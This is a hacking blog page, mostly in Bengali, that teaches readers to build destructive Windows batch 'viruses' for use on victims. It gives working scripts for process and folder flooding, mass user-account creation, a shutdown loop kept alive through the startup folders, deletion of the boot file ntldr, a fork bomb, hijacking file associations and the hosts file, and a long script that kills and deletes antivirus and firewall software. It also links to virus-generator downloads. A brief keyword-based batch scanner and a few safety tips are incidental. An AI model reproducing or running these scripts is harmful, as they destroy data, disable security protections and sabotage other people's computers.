Showing posts with label VIRUS. Show all posts
Showing posts with label VIRUS. Show all posts

HOW TO CREATED VIRUS........


এই পোস্ট এ আমি আপনাদেরকে অন্য কোন সাইট থেকে বা নিজের লেখা  ভাইরাস স্ক্রিপ্ট দিয়ে বলতে পারতাম এটি .bat নামে সেভ করুন । আর ভাইরাস বানান  আপনার শত্রুকে ধ্বংস করে দিন । কিন্তু এতে আপনি এর গুরুত্ব কতটা বুঝতে পারতেন ? এভাবে আরেকজনের থেকে কপি করে লাভ ই বা কি ??? তাই আমি আপনাদের বলব batch file এর সাতকাহন । তাতে আপনি নিজেই কম্যান্ড দিয়ে ভাইরাস স্ক্রিপ্ট , এন্টিভাইরাস স্ক্রিপ্ট লিখতে পারবেন ।
এখানে আমি কোন স্ক্রিনশট দেব না কারন আমি নিজেও অনেক সাইট পড়ে এবং অভিজ্ঞতা থেকে এটি লিখছি ...............
What are Batch Files ?
একটা উদাহরণ দিয়ে শুরু করা যাক । star থেকে রান এ গিয়ে cmd ওপেন করুন । এখন আপনার ডাইরেক্টরি "Desktop" থেকে সরাতে "Cd Desktop" টাইপ করুন উদ্ধরন চিহ্ন ছাড়া । এখন নিচের তিনটি কম্যান্ড এক এক করে লিখুন ।

1. md x  //makes directory 'x' on desktop
2. cd x  // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'
লক্ষ্য করুন আমরা কি করলাম । প্রথমে x ফোল্ডার তৈরি করলাম । এরপর এর ভেতরে গিয়ে y ফোল্ডার তৈরি করলাম। এরপর x ডিলিট করে দিলাম ।
এখন এই কাজ টাই একটু অন্য ভাবে করুন । এগুলকে নিয়ে নোটপ্যাড এ কপি করে সেভ করুন । নাম এর শেষ এ .bat থাকতে হবে ।
তাহলে দেখবেন উপরে বর্ণিত কাজ টা হবে ।
তাহলে বোঝা গেল batch হচ্ছে এমন ধরনের ফাইল টাইপ যা হল তার মধ্যে দেয়া কম্যান্ড গুলকে অনুসরন করে কাজ করে । আপনি হয়তবা মনে করবেন Malware বা ছোট Trojan বানান খুব কঠিন । সেরকম না । কিন্তু যে বানাবে তার মানসিকতাই আসল

What can batch viruses do ?
প্রশ্ন হল এদের দিয়ে কি কি কাজ করা যায় ??
এদের দিয়ে অনেক কাজ করা যায় যেমন ধরুন ডাটা ডিলিট করা। ড্রাইভ ফরমেট
, তথ্য চুরি , ভাইরাস ইঞ্জেক্ট, পারফর্মেন্স বাধা গ্রস্থ করা । খামাকা মানুষ কে বিপদে ফেলা এসব............
এখন কিছু উদাহরণ প্র্যাকটিস করা যাক। নিচের কোড গুলো পিসিতে সেভ করে  দেখুন ।
1.  Application Bomber
@echo off // It instructs to hide the commands when batch files is executed
:x   //loop variable
start winword 
start mspaint  //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
 প্রথমে আপনাকে @echo off দিয়ে ফাইল কে অন্য ফাইল থেকে আলাদা করতে হবে । এরপর এই সব একসাথে বা আলাদা আলাদাভাবে নোটপ্যাড এ লিখে .bat দিয়ে যে কোন নামে সেভ করুন । এগুলো ক্ষতিকর না । আপনি ওপেন করতে পারেন । তবে এভাবেই কমান্ড কম্বাইন্ড করে victim কে বিরক্ত করা হয় ।
2. Folder flooder
@echo off
:x
md %random% // makes directory/folder. 
goto x

%random% এর মাধ্যমে বলা হয়েছে যে কোন ধনাত্মক সংখ্যা প্রিন্ট করতে । যার ফলে এটি ওপেন করলে যে কোন ড্রাইভ এ এটি ফোল্ডার বানাতেই থাকবে । এটি পিসিতে ওপেন করবেন না ।
3.User account flooder 
@echo off
:x
net user %random% /add //create user account
goto x
এটি যেকোনো নাম্বার বসিয়ে উইন্ডোজ এ ইউযার account তৈরি করতে থাকবে

4.Shutdown Virus
shutdown -s -t 00  //
এই কোড এর মাধ্যমে পিসি সাথে সাথে বন্ধ হয়ে যাবে । মনে হবে হার্ডডিস্ক ফেইল করেছে
কিন্তু এটি একবার এই হবে আপনি যদি এটি চালু রাখতে চান তবে “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”  এবং  “C:\Documents and Settings\All Users\Start Menu\Programs\Startup”তে পেস্ট করতে হবে । যার ফলে পিসি ছাড়া হলে বারবার এটি হতে থাকবে । আপনাকে আই দুই ডিরেক্টরি থেকে ফাইল দিলিট করে এটি বন্ধ করতে হবে ।
5. Deleting boot filesGoto C drive in Win XP , Tools->Folder Option->View
এখন 'Show hidden files and folders'. এ চেক দিয়ে বের হয়ে আসুন । এখন আপনি অপারেটিং সিস্টেম এর ফাইল দেখতেও পাবেন । 'ntldr'  নামে একটি ফাইল আছে যা উইন্ডোজ এর বূট নিয়ন্ত্রন করে . এখন একে ডিলিট করতে একটা ব্যাচ ফাইল বানাব
attrib -S -R -H C:\ntldr   // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr    //delete ntldr file
   এটি রান করার সাথে সাথে ফাইল টি ডিলিট হয়ে যাবে । আপনি নিজের পিসি তে এটি রান করবেন না ।
5. Fork Bomb
%0|%0  //Its percentage zero pipe percentage zero
এই কোড ফাইল ম্যানেজার কে বলবে গুন হতে । যার ফলে আপনার অজান্তে পিসিতে ক্যাশ মেমরি বেড়ে যাবে শেষ এ পিসি হ্যাঁ ং হবে
6. Extension Changer
@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything                          
প্রতটি ফাইল এর আলাদা ফরমেট আছে যেমন .exe, .jpeg, .mkv ইত্যাদি । এই কোড  চালাবার  সাথে সাথে সব ফরমেট ও লট পালট হয়ে যাবে এবং । প্রোগ্রাম রি ইন্সটাল করতে হবে । তাই অন্তত পিসি তে এটি চলাবেন না ।
7.  DNS Poisoning
আপনার উইন্ডোজ এ  ‘hosts’ নামে ফাইল  আছে এখানে  c:\windows\system32\drivers\etc. আমরা এখানে একটি আইপি এবং ওয়েবসাইট বসিয়ে দিতে পারি . তাহলে আমাদের ব্রাউযার সেই ওয়েবসাইট এ আমাদের নিয়ে যাবে .
@echo off
echo xxx.xxx.xxx.xxx http://www.anything.com > C:\windows\system32\drivers\etc\hosts   //এই কম্যান্ড তাহলে আইপি এবং ওয়েবসাইট কে host এ প্রিন্ট করবে
 xxx.xxx.xxx.xxx  এবং  http://www.anything.com  এ আপনার কাঙ্খিত আইপি এবং ওয়েবসাইট বসাবেন । এরফলে যে এটি ওপেন করবে সে সেই সাইট ছাড়া তার ব্রাউযার অন্য সাইট দেখতে পাবেনা ।
 Limitations of Batch Viruses -:
কিন্তু কিছু সমস্যা আছে ...............
যে কেউ এটি ওপেন না করে নোট প্যাড দিয়ে ভিউ করতে পারে । যার ফলে সে সতরক হয়ে যাবে ।
এটি ভাইরাস হলে আন্টিভাইরাস ও উইন্ডোজ AlaRt দেবে । এর সমাধান আছে ।
কিন্তু আমি বলছি না । খারাপ পারপাসে  ব্যাবহার হতে পারে ।

একটা অফ টপিক । ভাল না লাগলে এড়িয়ে যান 
এ পর্যন্ত যারা আমার বকবক শুনেছেন তাদের ধারনা হয়েছে এগুলো দিয়ে শুধু আযেবাযে কাজ করা যায় । তা না ......
আমি একটা ছোটখাটো batch antivirus এর কো ড করেছি ।
@echo off
color cb
/////////Rashed Hasan /////////
cls
echo ===============
echo [ Batch-Master]
echo ===============
echo If There's no message ,You are protected.
set /p a=Enter a batch file to scan:
for /f %%x in (
'findstr /i /m "virus r.i.p byebye HaHaHa Hacked Hack" %a%.bat'
) do (
if /i %%x equ %a%.bat (
for /f %%z in (
'findstr /i /b /m "tskill del copy shutdown ipconfig ren reg" %a%.bat'
) do (
if /i %%z equ %a%.bat (
cls
echo Virus Detected!!
echo %a%.bat was deleted....
del %a%.bat & pause >nul
)
)
)
)
pause >nul
_______   BCA   ___________
এটি আপনার পিসি তে zekono kichu .bat নামে সেভ করুন । এটিতে আপনি যে কোন .bat ফাইল এর নাম লিখে স্ক্যান করতে পারবেন ।

World Top virus code(any hard disk crash))

Just copy the code and paste the notepad than save as """pleasehack.bat""  mind it  ".bat"
than save.carefully don"t open bat file.


@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --


TROJAN INJECTING AND TROJAN BACKDOR.......

ট্রোজান আর ব্যাক ডোর হল দুটি পদ্ধতি যার মাধ্যমে একজন হ্যাকার কোন সিস্টেম এ প্রবেশ করতে পারেন ।সাধারনত ব্যাক ডোর বা ট্রোজান একটি সিস্টেম এ অন্য কোন প্রোগ্রাম এর মাধ্যমে প্রবেশ করে ।ইথিকাল হ্যাকার সাধারন ভাবে পরীক্ষা করার জন্য এগুলো ব্যাবহার করে থাকেন । এই দুটি হল ম্যালওয়ার এর একটি রুপ যা অন্য কোন সার্ভার এ অন্য ফাইল এর মাধ্যমে যাবার চেষ্টা করে ।

আর ব্যাক ডোর বলতে বোঝানো হয় একটি পথ তৈরি করা যার মাধ্যমে  ট্রোজান কোন সিস্টেম এ প্রবেশ করে। সাধারনত ট্রোজান কোন অন্য ছবি বা মিউজিক ফাইল এর মাধ্যমে ছড়িয়ে যায় । এতে Steganography পদ্ধতি টি ব্যাবহার করা হয় । এটি সম্পর্কে না যানলে আমি এ নিয়ে লিখেছি । সেটি পড়ে নিবেন ।। সাধারন ভাবে ট্রোজান ছড়ানোর সবথেকে সহজ উপায় হল ব্যাচ ফাইল বা একে .exe তে রুপান্তর করে ইন্সটলার এর মাধ্যমে ছড়িয়ে দেয়া । এতে হ্যাকার রা বিভিন্ন ধরনের GUI ব্যাবহার করেন অন্য দের আকৃষ্ট করার জন্য ।
কয়েকটি কমন ট্রোজান  :
BackOrifice
Deep Throat
NetBus
Whack a mole
Girlfriend
Masters Paradise

এগুলর মধ্যে সবথেকে বিপদজনক হচ্ছে  Girlfriend এবং Netbus । কারন এগুলো ব্যাচ ফাইল এর মাধ্যমে তৈরি করা যায় । এবং কোডের কয়েকটি লাইন পরিবর্তন করে দিলেই দুর্ধর্ষ ভাইরাস  এ পরিনত হয় । আপনি যদি হ্যাকার হতে চান বা সিকিউরিটি নিয়ে কাজ করতে চান আপনাকে অবশ্যই এগুলো নিয়ে কাজ করতে হবে । কিন্তু নিজের কম্পিউটার এ গুলো নিয়ে ঘাটাঘাটি না করে কোন ভার্চুয়াল পরিবেশ তৈরি করাই ভাল । যেমন যারা Comodo  এর ভার্চুয়াল সিকিউরিটি ব্যাবহার করেন তারা যানেন । এই ভাইরাস গুলো নিয়ে কাজ করা কতটা বিপদজনক ।
ট্রোজান এর প্রকারভেদ
বিভিন্ন ধরেনের ট্রোজান আছে । সেগুলর কয়েকটি নিচে তুলে ধরা হল :
Remote Access Trojans : কোন সিস্টেম এ রিমোট অ্যাক্সেস পেতে ব্যাবহার করা হয়

Data Sending Trijans : এটি সাধারনত ডাটা খুঁজে বের করে হ্যাকার এর কাছে তা পাঠিয়ে দেয় ।
Destructive Trojans: এর সাহায্যে কম্পিউটার এর ক্ষতি করা হয় ।
FTP trojans: এটিকে ব্যাবহার করতে হ্যাকার রা port 21 ব্যাবহার করে থাকেন ।
SSDT: এটির পূর্ণরূপ আপনারা কাজ শুনলেই বুঝতে পারবেন । এর মাধ্যমে কোন নির্দিষ্ট বা অনেকগুল antivirus প্রোগ্রাম কে অকেজ   করে দেয়া হয় ।
কয়েকটি ট্রোজান প্রোগ্রাম

Troj_OAJ

এই ট্রোজান টি যে কোন নোটপ্যাড ফাইল কে টারগেট করে । এরপর সেটিকে word ফরমেট পরিবর্তন করে note.com এ নিয়ে যায় । এরপর সেটি windows এর নোটপ্যাড ফোল্ডার এ কপি হয় । এরপর আপনি যতবার নোটপ্যাড খুলবেন ততবার এই ভাইরাস টি আক্টিভ হবে ।
Donald Duck
এটি একটি ব্যাক ডোর ট্রোজান । এটি হ্যাকার কে যেকোনো সিস্টেম এ পুরপরি নিয়ন্ত্রন এনে দেয় । এটার সাথে একটি কি লগার এবং রেজিস্ট্রি এডিট করার প্রগ্রাম থাকে ।এর সাহায্যে সিডি বা ডিভিডি রম খোলা বা বন্ধ করাও সম্ভব হয় । এটি ইঞ্জেক্ট করতে হ্যাকার23476 ও ২৩৪৭৭ ব্যাবহার করে থাকেন
CyberSpy

এটি মূলত একটি স্পাই প্রোগ্রাম । এটি রেজিস্ট্রি তে নিজেকে এন্ট্রি করে নেয়। যার ফলে আন্টিভাইরাস দিয়ে ডিলিট করে দিলেও কম্পিউটার রিবুট করলে আবার এটি আক্টিভ হয়ে যায় ।
Firekill 2000
এই ট্রোজান টি মারাত্তক । এটি সব ধরনের ফায়ারওয়াল , এন্টিভাইরাস কে disable করে দিতে সক্ষম । এমনকি এটি সিকিউরিটি সফটওয়্যার এর নিরাপত্তা  কে ধ্বংস করতে .dll ফাইল কে ডিলিট করে দেয় । তখন সিস্টেম আবার সেটআপ দিতে হয় ।
এছাড়া আর অনেক ট্রোজান প্রোগ্রাম আছে । অনেক ট্রোজান Netcat এর সাহায্যে launch করা হয় । আবার অনেক ট্রোজান সার্ভার রুটিং করে ইঞ্জেক্ট করা হয় ।

একটি ট্রোজান ভাইরাস
এটি আমার নিজের কোড করা একটি ছোট ট্রোজান । এটি এন্টিভাইরাস এর সিকিউরিটি কে রুখে দিতে পারবে ।  এটি মূলত আপনার ওয়িন্দএস এর ফায়ার ওয়াল ও এন্টিভাইরাস এর safe guard কে রুখে দেবে । এটির ইন্টারফেস সবুজ রঙের।  
@ echo off
_Rashed Hasan_

∙ rem –
  colour Db 03
∙ rem Permanently Kill Anti-Virus
∙ net stop “Security Center”
netsh firewall set opmode mode=disable ∙ tskill /A av* ∙
tskill /A fire*
tskill /A [...].
_BCA_
আপনাদেরকে আর ও একটি বিধ্বংসী ট্রোজান এর লিঙ্ক দিতে পারি । কিন্তু সেটি কম্পিউটার এ রান করবেন না । একটি সহজ ট্রিক হচ্ছে কপি পেস্টিং সাইট যেমন http://www.pastebin.com এ যেয়ে পেস্ট করে সেভ করবেন। সেটি যদি কোন ভাইরাস হয় তবে দেখতে পাবেন আপনার এন্টিভাইরাস সিকিউরিটি warning দেবে। আর সেই লিঙ্ক এ প্রবেশ করতে  গেলে আপনার ব্রাউযার থেমে যাবে ।
এই ভাইরাস টি কোন অবস্থাতেই রান করবেন না । এটি ভারতের একজন সিকিউরিটি এক্সপার্ট এর কোড করা
http://www.breakthesecurity.com/2010/12/how-to-disabledelete-your-victims.html

বাঁচার কিছু উপায়
> আপনি যে এন্টিভাইরাস ব্যাবহার করে থাকুন না কেন সেটি আপ টু ডেট থাকতে হবে ।
> সন্দেহ জনক কোন টুল বা লিঙ্ক এ ক্লিক করবেন না ।
> আপনার antivirus এর পাশাপাশি  anti spam ও anti rootkit ব্যাবহার করবেন । আমি বলব অ্যান্টিভাইরাস এর সাথে আপনি kaspersky এর TDS killer টুল টী ব্যাবহার করতে পারেন । এটি পুরো পুরি পোর্টেবল একটি টুল ।

তাহলে আজ এই পর্যন্তই ছিল ।

VIRUS CREATOR SOFTWARE


SONIC BAT - THE BATCH FILE VIRUS CREATOR 


This program creates batch (.bat) viruses and has
 varied options to ruin the victim computer in 
different ways. We can flood the storage space 
 on victims' computer by making large number 
of files in different folders by using its "folder 
flood" feature. It also includes bat to exe 
converter to convert your batch virus files i
nto exe virus programs and an icon changer.

Download here:

http://www.mediafire.com/download.php?ijzjmx3kd3t

DELmE's BATCH VIRUS GENERATOR 



DELmE's Batch Virus Generator is an amazing virus creation 
program with lots of options to infect the victim PC such as format
 C: drive, delete all files, disable admin, clean registry, change home 
page, kill tasks, antivirus and firewall and lots more. 

Download here:  

http://www.ziddu.com/download/7051522/DELmE_sBatchVirusGeneratorv2.0.rar.html 

Password: hackingguide

BATCH TO EXE CONVERTER



Batch to exe converter is a program to convert batch (.bat) 
files to executable (.exe) files. It includes several options such 
as including any other file, adding an icon to the file before compilation. 

Download here:  

http://www.ziddu.com/download/6961652/Batch_to_Exe_converter.rar.html 

Password: hackingguide

VIRUS CREATOR


This Virus Creator is a simple one as it gives few options
 to infect victim's computer like format system drive, 
corrupt system files etc. 

Download here:  

http://www.ziddu.com/download/6953378/VirusCreatorV.65.rar.html 


Password: hackingguide